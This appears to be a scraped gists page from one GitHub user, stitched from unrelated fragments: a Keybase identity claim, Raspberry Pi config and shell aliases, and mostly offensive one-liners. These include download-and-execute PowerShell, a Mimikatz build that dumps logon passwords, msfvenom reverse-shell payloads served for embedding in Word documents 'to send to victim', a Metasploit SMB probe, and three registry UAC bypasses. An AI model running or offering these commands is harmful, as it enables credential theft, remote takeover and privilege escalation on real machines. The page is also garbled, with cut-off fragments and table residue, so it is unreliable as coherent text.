I hereby claim:
- I am xillwillx on github.
- I am illwill (https://keybase.io/illwill) on keybase.
- I have a public key whose fingerprint is 6D14 E83A 93C6 3380 4F0F FF70 E170 DBAA AE04 6737
To claim this, I am signing this object:
$admins = Gwmi win32_groupuser –computer 127.0.0.1;$admins = $admins |? {$_.groupcomponent –like '*"Administrators"'}; $admins |% {$_.partcomponent –match “.+Domain\=(.+)\,Name\=(.+)$” > $nul;$matches[1].trim('"') + “\” + $matches[2].trim('"') | Select-Object @{Name='Account Name';Expression={$_}}} |
iex (New-Object net.webclient).downloadstring('https://github.com/FuzzySecurity/PowerShell-Suite/raw/master/Native-HardLink.ps1');start microsoft-edge:;get-process -name MicrosoftEdge | Stop-process;sleep 2;Native-HardLink -Link "$env:localappdata\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings\settings.dat" -target "$env:windir\system32\drivers\etc\hosts";start microsoft-edge:;get-process -name Microsoftedge | stop-process |
ssh [email protected] | |
nano /boot/config.txt | |
ctrl+w to find | |
Type: i2c_arm and add the uncommented lines underneath | |
## i2c_arm | |
## Enable the ARM's i2c interface | |
## | |
## Default off. | |
## |
export PATH="$PATH:/usr/bin/" | |
alias ll='ls -GFHAf -1' # ll: directory listing in 1 column | |
alias f='open -a Finder ./' # f: Opens current directory in MacOS Finder | |
alias cpwd='pwd|tr -d "\n"|pbcopy' # cpwd: copy the working directory path | |
alias ..="cd ../" | |
alias ...="cd ../../" | |
alias ....="cd ../../../" | |
alias wttr='curl wttr.in/06451?0u' | |
alias myip='curl -s http://whatismyip.akamai.com/' ;echo |
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* |
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH | |
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'` | |
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin | |
PAYLOAD=$(cat payload.bin | base64 -w 0) | |
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js | |
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs | |
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta | |
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta | |
service apache2 start | |
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\ |
# Test victim IP first to see if exploitable | |
msfconsole | |
use auxiliary/scanner/smb/pipe_auditor | |
set RHOSTS 192.168.128.19 | |
exploit | |
#*choose pipe name 'netlogon' | |
######Exploiting the Victim########## | |
# Setup Meterpreter Handler |
<# | |
.Synopsis | |
____ _ _ ___ _ _ _ | |
| __(_)__| |_ / __| |_(_)__| |__ ___ | |
| _|| (_-< ' \\__ \ _| / _| / /(_-< | |
|_| |_/__/_||_|___/\__|_\__|_\_\/__/.v1 | |
"Life is like a box of FishSticks, you never know what you're gonna get..." | |
Benjamin Buford "Bubba" Blue - 1965. |
**UAC bypass for Win10:** | |
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f | |
**UAC bypass for Win10:** | |
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f | |
**UAC bypass for 7/8/10:** | |
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f |
I hereby claim:
To claim this, I am signing this object: